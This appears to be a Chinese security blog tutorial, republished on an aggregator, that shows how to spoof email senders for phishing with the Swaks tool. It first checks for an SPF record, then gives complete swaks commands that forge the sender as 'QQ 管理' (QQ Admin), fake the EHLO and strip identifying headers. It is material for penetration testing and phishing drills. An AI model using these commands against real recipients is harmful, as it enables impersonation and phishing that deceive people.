码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 邮件钓鱼--有无SPF演示--Swaks


    目录

    临时邮箱网址:

    Swaks 简单使用说明:(kali自带)

    操作流程:

    无SPF:(直接伪造发信人)

    演示1

     演示2

    演示3

    ​编辑

    有SPF:--演示


    临时邮箱网址:

    http://24mail.chacuo.net/ 
    https://www.linshi-email.com/ 


    Swaks 简单使用说明:(kali自带)

    -t –to 目标地址 -t test@test.com 
    -f –from 来源地址 (发件人) -f "text" 
    –protocol 设定协议(未测试) 
    --body "http://www.baidu.com" //引号中的内容即为邮件正文; 
    --header "Subject:hello" //邮件头信息,subject 为邮件标题 
    -ehlo 伪造邮件 ehlo 头 
    --data ./Desktop/email.txt //将 TXT 文件作为邮件发送; 


    操作流程:

    1、检测: 
    nslookup -type=txt xxx.com 
    2、伪造: 
    swaks ...............


    无SPF:(直接伪造发信人)

    演示1

    swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "QQ 管理" --ehlo shabimeiguo -header "Subject: 测试" --body 我们做了一个测试 --to qzmydusmoy@iubridge.com

    ---直接伪造发信人 

     

     演示2

    swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "QQ 管理" --ehlo shabimeiguo -header "Subject: 测试" --body 我们做了一个测试 --to tripjf08516@chacuo.net

    演示3

    1. swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "QQ 管理" --ehlo shabimeiguo -header "Subject: 测试" --body 我们做了一个测试 --to uoysvj84956@027168.com

     


    有SPF:--演示

    swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "" --ehlo shabimeiguo -header "Subject: 测试" --body 我们做了一个测试 --to xxxxxxxxx9@163.com


  • 相关阅读:
    计算机网络篇之ARP包结构
    【机器学习基础】无监督学习(2)——降维之LLE和TSNE
    面试官:synchronized 和 Lock 的区别是什么?
    MySQL 啥时候用表锁,啥时候用行锁?
    F28335-可移植新建工程模板-基于bitfield
    为什么 Go 语言 struct 要使用 tags
    【LinkedHashMap】146. LRU 缓存
    使用树莓派学习Linux系统编程的 --- 库编程(面试重点)
    JavaScript变量提升
    Cruise 建立自己的文件路径
  • 原文地址:https://blog.csdn.net/2303_80857229/article/details/139706896
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号